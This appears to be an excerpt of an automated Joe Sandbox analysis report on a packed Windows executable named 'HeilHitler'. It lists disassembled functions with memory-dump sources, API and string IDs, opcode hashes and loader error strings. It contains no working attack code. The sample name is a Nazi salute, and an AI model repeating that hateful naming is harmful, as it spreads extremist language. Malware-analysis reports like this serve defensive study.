                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                            • Instruction ID: 3d30e22eac2da69a26b189011b0e9b9a4b641136967f0424b5988d76506766e5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3851B136A18A5186E7258FA9C04633877A1EB45F58F285331DE4CA7794DF3AEC43E740
                                                                                                                                                                                                                                            Function 00007FF633D71F60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                            • Instruction ID: 915d9ae5f0f63b84579358a11b4abef7d190fcc271556e85ceb0368ff4a4a467
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA51A137A1869186E7248F69C04633877A0EB44F58F244331CE4CA77A9CF3AE853E740
                                                                                                                                                                                                                                            Function 00007FF633D71740 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                            • Instruction ID: e932a840f88a994914cd9f2d058417239f7ab6cdb26019f3a725234717a1ef00
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B515E76A1865186E7348F69C04627C37A1EB49B58F284331CE4DA7799CF3AEC53E780
                                                                                                                                                                                                                                            Function 00007FF633D75D30 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                            • Instruction ID: da1be9170bb503dff77425e728863b08797a0ab264545c8ff2b6099e016c6346
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641E562C1D78A05EDA98DDC050A6B827829F12BA0F5813B5DDADB73C3DD0D6586E203
                                                                                                                                                                                                                                            Function 00007FF633D79EA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                            • Instruction ID: 66d7bf529f6aef5a0606e74924a7c16ee4c844b59739c0ac9b9a944361dfab64
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA412522714A5582EF04CFAAD925579B3A1FB48FC0B499636EE0DE7B58EE3DD0529300
                                                                                                                                                                                                                                            Function 00007FF633D780E4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                            • Instruction ID: 5dc3445b0b061483ad8436e507d0d7ec47e32ef1d2347056d39645f25f8b1a2d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31D532B09B4241E7649F65A84213EBAD5AF84BD0F544338EE8DA7BD5DF3CD0129704
                                                                                                                                                                                                                                            Function 00007FF633D89570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                            • Instruction ID: a25b464db52bd6f6cc4b4066ae64ba2c9e6b0e4b40955be02976ff23651c9a75
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F04471B182958ADB988FADA40362977D1F7083C0F449139D58DC3F04DE3C90519F04
                                                                                                                                                                                                                                            Function 00007FF633D6D30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                            • Instruction ID: e3ecd5e42d6249402766b6146058c56e86eb0c910cc396ae47fa564b29b5e17c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BA00121D0C80AD4E6448B81A8A21252220BB95310B801231E02DB52B89E2CA504A340
                                                                                                                                                                                                                                            Function 00007FF633D676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                            • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                            • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                            • Instruction ID: d3a152d9022fc5cbed8f13374cf45911348c57e92719812608b5a812cbb71400
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB02E525E0DB0B90FA459BE5A8129B433A1BF05754F942335E43EAA3A5FF3CB559B300
                                                                                                                                                                                                                                            Function 00007FF633D681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF633D686B7,?,?,00000000,00007FF633D63CBB), ref: 00007FF633D6822C
                                                                                                                                                                                                                                              • Part of subcall function 00007FF633D62810: MessageBoxW.USER32 ref: 00007FF633D628EA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                            • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                            • Instruction ID: 16f7a4d3d11730a4688e763166bcd7f3f1033222b3c64f62f783ab04b24030c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A351B721A2C64281FA509BA5E8536BA7360AF94781F845631E61FE77D5FE3CF504A300
                                                                                                                                                                                                                                            Function 00007FF633D62180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                            • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction ID: 15a930fb3604a091e0071d4d3dfc1e71deb172d3b171f49913c23aa53b7f5003
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C51E726608BA186D6349F36E4181BAB7A1F798B65F004225EFDF83795DF3CD085DB10
                                                                                                                                                                                                                                            Function 00007FF633D680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                            • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                            • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                            • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                            • Instruction ID: 8102a2354b22de0beb218e9c40ede504b4c952b5fd5cbce5b8658eff246ae12e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C21B721B08A4281E7418BFAE8561797250FF89F91F585330DE3ED73E9DE2CE5959300
                                                                                                                                                                                                                                            Function 00007FF633D76290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                            • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                            • Instruction ID: a1e15ba2d683aff4b89c6501d1bc6059eaef906aa9de14d71b9258e8bcd0fd10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B12A372E0C24386FB645E94D1562BD76A2FB50754FC84235E68DA6BC4FF3CE980AB00
                                                                                                                                                                                                                                            Function 00007FF633D70FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                            • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                            • Instruction ID: 566f00aa2c38b411a9e5758c010c0e7eed45ca89efc92fd79a1817dff0e078d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA12B762E0C14386FB245E94E0466B977A1FB80794FD84335E69E97BC4DF3CE484AB00
                                                                                                                                                                                                                                            Function 00007FF633D61050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
